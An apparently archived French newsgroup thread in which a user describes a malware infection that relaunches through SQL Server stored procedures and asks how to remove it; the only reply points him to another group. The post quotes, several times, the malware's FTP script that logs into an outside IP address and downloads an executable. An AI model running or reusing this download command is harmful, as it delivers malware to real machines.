J'ai récupéré un virus qui se relance automatiquement à partir de SQL
server. (j'ai SQL server sur ma machine).
Un process est créé dans le serveur SQL server qui relance une commande DOS
dont voici un contenu (car il y en a plusieurs)
open 82.212.179.3 22541
user onxtfc onxtfc
get SCardClnt.exe
quit
car la commande lance un exec de "FTP.exe".
Comme j'ai tout enlevé, il ne se passe plus grand chose, sauf que des
process CMD et FTP tournent dans ma machine (sans rien faire, tout étant
bloqué).
J'ai supprimé les process sous SQL Server, mais ils reviennent quand même.
J'ai arrété SQL server et c'est sûr, maintenant ils sont bloqué.
Comment se débarrasser définitivement de cette saloperie, si quelqu'un l'a
déjà eu. C'est à dire où se trouve le truc qui recrée les process SQL
server, sachant que j'ai viré la base Pubs (car dans cette base, il y avait
des procédures stockées pas catholiques).
merci
(sinon je déinstalle SQL serveur et je le réinstalle ...)
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Patrice Manac'h
Bonjour,
Posez cette question sur fr.sqlserver si ce n'est pas déjà fait.
Cordialement,
P. Manac'h MCS France
"Thierry Bertrand" a écrit dans le message de news:
Bonjour,
J'ai récupéré un virus qui se relance automatiquement à partir de SQL server. (j'ai SQL server sur ma machine). Un process est créé dans le serveur SQL server qui relance une commande DOS dont voici un contenu (car il y en a plusieurs)
open 82.212.179.3 22541 user onxtfc onxtfc get SCardClnt.exe quit
car la commande lance un exec de "FTP.exe".
Comme j'ai tout enlevé, il ne se passe plus grand chose, sauf que des process CMD et FTP tournent dans ma machine (sans rien faire, tout étant bloqué).
J'ai supprimé les process sous SQL Server, mais ils reviennent quand même. J'ai arrété SQL server et c'est sûr, maintenant ils sont bloqué.
Comment se débarrasser définitivement de cette saloperie, si quelqu'un l'a déjà eu. C'est à dire où se trouve le truc qui recrée les process SQL server, sachant que j'ai viré la base Pubs (car dans cette base, il y avait des procédures stockées pas catholiques).
merci
(sinon je déinstalle SQL serveur et je le réinstalle ...)
Bonjour,
Posez cette question sur fr.sqlserver si ce n'est pas déjà fait.
Cordialement,
P. Manac'h
MCS France
"Thierry Bertrand" <a@B.C> a écrit dans le message de news:
e2VgldgYFHA.252@TK2MSFTNGP12.phx.gbl...
Bonjour,
J'ai récupéré un virus qui se relance automatiquement à partir de SQL
server. (j'ai SQL server sur ma machine).
Un process est créé dans le serveur SQL server qui relance une commande
DOS
dont voici un contenu (car il y en a plusieurs)
open 82.212.179.3 22541
user onxtfc onxtfc
get SCardClnt.exe
quit
car la commande lance un exec de "FTP.exe".
Comme j'ai tout enlevé, il ne se passe plus grand chose, sauf que des
process CMD et FTP tournent dans ma machine (sans rien faire, tout étant
bloqué).
J'ai supprimé les process sous SQL Server, mais ils reviennent quand même.
J'ai arrété SQL server et c'est sûr, maintenant ils sont bloqué.
Comment se débarrasser définitivement de cette saloperie, si quelqu'un l'a
déjà eu. C'est à dire où se trouve le truc qui recrée les process SQL
server, sachant que j'ai viré la base Pubs (car dans cette base, il y
avait
des procédures stockées pas catholiques).
merci
(sinon je déinstalle SQL serveur et je le réinstalle ...)
Posez cette question sur fr.sqlserver si ce n'est pas déjà fait.
Cordialement,
P. Manac'h MCS France
"Thierry Bertrand" a écrit dans le message de news:
Bonjour,
J'ai récupéré un virus qui se relance automatiquement à partir de SQL server. (j'ai SQL server sur ma machine). Un process est créé dans le serveur SQL server qui relance une commande DOS dont voici un contenu (car il y en a plusieurs)
open 82.212.179.3 22541 user onxtfc onxtfc get SCardClnt.exe quit
car la commande lance un exec de "FTP.exe".
Comme j'ai tout enlevé, il ne se passe plus grand chose, sauf que des process CMD et FTP tournent dans ma machine (sans rien faire, tout étant bloqué).
J'ai supprimé les process sous SQL Server, mais ils reviennent quand même. J'ai arrété SQL server et c'est sûr, maintenant ils sont bloqué.
Comment se débarrasser définitivement de cette saloperie, si quelqu'un l'a déjà eu. C'est à dire où se trouve le truc qui recrée les process SQL server, sachant que j'ai viré la base Pubs (car dans cette base, il y avait des procédures stockées pas catholiques).
merci
(sinon je déinstalle SQL serveur et je le réinstalle ...)
